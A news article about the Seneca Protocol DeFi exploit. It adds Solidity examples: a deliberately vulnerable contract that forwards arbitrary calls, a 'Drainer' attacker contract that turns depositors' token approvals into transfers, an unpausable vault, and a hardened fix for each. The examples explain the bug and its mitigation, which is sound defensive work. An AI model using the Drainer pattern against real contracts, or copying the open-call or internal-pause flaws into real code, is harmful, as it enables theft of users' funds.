Decentralized finance (DeFi) lending platform and stablecoin issuer Seneca Protocol announced on February 28th that it had fallen victim to an exploit, with estimated losses of $6.4 million. The protocol disclosed the incident in a statement from its official X account. According to a report by blockchain security firm CertiK, the Seneca team is working with security specialists to investigate the bug behind the exploit and is urging users to revoke token approvals granted to the affected contracts.
Seneca Protocol is a DeFi lending application that enables users to deposit various cryptocurrencies as collateral. These collateralized assets can then be used to mint and borrow the platform’s native stablecoin, SenecaUSD.
Blockchain data indicates that an account ending in 42DC transferred approximately 1,385.23 Pendle principal-token Kelp restaked Ether (PT Kelp rsETH) out of a Seneca collateral pool by calling the “performOperations” function. The account then swapped these tokens for around $4 million worth of Ether (ETH) across three transactions. Afterward, it moved a further 717.04 ETH derivative tokens from other collateral pools and exchanged them for ETH as well.
CertiK’s report describes these transfers as malicious and attributes the exploit to a flaw in the protocol’s “performOperations” function: any account can call it and request OPERATION_CALL, and the caller fully controls both the callee address and the callData. The contract therefore performs an arbitrary external call from its own address, putting anything it is permitted to move, including tokens that depositors have approved to it, within reach of whoever calls the function. That is how the attacker drained a collateral pool they did not own, and it is why users are being told to revoke approvals for the affected contracts.
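The pattern CertiK describes, reconstructed as an added Solidity example (this is not Seneca’s code; the contract names, the deposit action, the numeric action IDs and the allow-list mitigation are all assumptions made for illustration). The vulnerable contract forwards a caller-chosen call from its own address; the attacker-side contract shows how that turns a depositor’s approval into a transfer; the hardened variant restricts the callee set.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Illustrative reconstruction, not Seneca's code. The contract name, the deposit
// action and the numeric action IDs are assumptions made for this example.
contract VulnerableChamber {
    uint8 public constant OPERATION_DEPOSIT = 1;
    uint8 public constant OPERATION_CALL = 30;
    IERC20 public immutable collateral;
    mapping(address => uint256) public collateralOf;

    constructor(IERC20 collateral_) {
        collateral = collateral_;
    }

    function performOperations(uint8[] calldata actions, bytes[] calldata datas) external {
        require(actions.length == datas.length, "length mismatch");
        for (uint256 i = 0; i < actions.length; i++) {
            if (actions[i] == OPERATION_DEPOSIT) {
                // Depositors approve this contract first; that standing allowance is
                // exactly what the OPERATION_CALL branch below lets anyone exercise.
                uint256 amount = abi.decode(datas[i], (uint256));
                require(collateral.transferFrom(msg.sender, address(this), amount), "transfer failed");
                collateralOf[msg.sender] += amount;
            } else if (actions[i] == OPERATION_CALL) {
                // BUG: callee and callData are fully caller-controlled and the call is
                // issued from this contract's address, so any approval granted to the
                // contract, and any token balance it holds, can be moved by anyone.
                (address callee, bytes memory callData) = abi.decode(datas[i], (address, bytes));
                (bool ok, ) = callee.call(callData);
                require(ok, "call failed");
            } else {
                revert("unknown action");
            }
        }
    }
}

// Attacker-side contract: the chamber itself invokes transferFrom on a victim's allowance.
contract Drainer {
    function drain(VulnerableChamber chamber, IERC20 token, address victim, uint256 amount) external {
        uint8[] memory actions = new uint8[](1);
        bytes[] memory datas = new bytes[](1);
        actions[0] = chamber.OPERATION_CALL();
        datas[0] = abi.encode(
            address(token),
            abi.encodeCall(IERC20.transferFrom, (victim, msg.sender, amount))
        );
        chamber.performOperations(actions, datas);
    }
}

// Hardened variant: OPERATION_CALL may only target an owner-curated set of callees that
// can never include the collateral token or the chamber itself (an assumed mitigation).
contract HardenedChamber {
    uint8 public constant OPERATION_DEPOSIT = 1;
    uint8 public constant OPERATION_CALL = 30;
    address public immutable owner;
    IERC20 public immutable collateral;
    mapping(address => uint256) public collateralOf;
    mapping(address => bool) public allowedCallee;

    constructor(IERC20 collateral_) {
        owner = msg.sender;
        collateral = collateral_;
    }

    function setAllowedCallee(address callee, bool allowed) external {
        require(msg.sender == owner, "not owner");
        require(callee != address(collateral) && callee != address(this), "forbidden callee");
        allowedCallee[callee] = allowed;
    }

    function performOperations(uint8[] calldata actions, bytes[] calldata datas) external {
        require(actions.length == datas.length, "length mismatch");
        for (uint256 i = 0; i < actions.length; i++) {
            if (actions[i] == OPERATION_DEPOSIT) {
                uint256 amount = abi.decode(datas[i], (uint256));
                require(collateral.transferFrom(msg.sender, address(this), amount), "transfer failed");
                collateralOf[msg.sender] += amount;
            } else if (actions[i] == OPERATION_CALL) {
                (address callee, bytes memory callData) = abi.decode(datas[i], (address, bytes));
                require(allowedCallee[callee], "callee not allowed");
                (bool ok, ) = callee.call(callData);
                require(ok, "call failed");
            } else {
                revert("unknown action");
            }
        }
    }
}
```

The check a reviewer would apply to any “generic call” action in a DeFi contract is the one the hardened variant encodes: the contract must never be able to call a token it holds balances or allowances on, nor itself, and the set of reachable callees should be closed rather than open. Revoking approvals, as Seneca and Spreek advised, removes the allowance that the Drainer contract above depends on.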
Spreek, a blockchain investigator, also warned users about the exploit, describing it as a critical vulnerability. Spreek advised users to revoke approvals for the addresses used in the attack.
Additionally, security researcher ddimitrov22 identified a second problem in Seneca Protocol: developers cannot pause the contracts. The pause and unpause functions are declared internal, so they cannot be invoked from outside the contract, which leaves the team without a working emergency stop.
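What that visibility mistake looks like in practice, as an added example rather than Seneca’s code (the contract names, the owner check and the withdraw function are assumptions). The first contract compiles cleanly but its pause switch is unreachable; the second exposes it behind an owner check.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative only, not Seneca's code: pause/unpause are `internal` and nothing in
// the contract calls them, so no transaction can ever flip `paused` and the
// whenNotPaused guard is dead weight during an incident.
contract UnpausableVault {
    bool public paused;
    address public immutable owner;

    constructor() {
        owner = msg.sender;
    }

    modifier whenNotPaused() {
        require(!paused, "paused");
        _;
    }

    // BUG: internal visibility; there is no external or public entry point to these.
    function pause() internal {
        paused = true;
    }

    function unpause() internal {
        paused = false;
    }

    function withdraw(uint256) external whenNotPaused {
        // effects and interactions would go here
    }
}

// Fix: expose the switch as external functions gated by an access check and emit
// events so the state change is visible on-chain.
contract PausableVault {
    bool public paused;
    address public immutable owner;

    event Paused(address indexed by);
    event Unpaused(address indexed by);

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    modifier whenNotPaused() {
        require(!paused, "paused");
        _;
    }

    function pause() external onlyOwner {
        paused = true;
        emit Paused(msg.sender);
    }

    function unpause() external onlyOwner {
        paused = false;
        emit Unpaused(msg.sender);
    }

    function withdraw(uint256) external whenNotPaused {
        // effects and interactions would go here
    }
}
```

A quick audit check for this class of bug is to list every function that writes the pause flag and confirm at least one is public or external; a compiler will not flag an internal function that is simply never called.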
The Seneca Protocol development team acknowledged the attack and assured users that an investigation is underway. They plan to provide an update on the situation soon.
Unfortunately, hacks and exploits continue to pose a threat to Web3 users in 2024. On February 23rd, Jeff “Jihoz” Zirlin, the co-founder of Axie Infinity, lost $9.7 million from a hack on his personal wallets. On the same day, the DeFi protocol Blueberry was exploited, resulting in a loss of 457 ETH.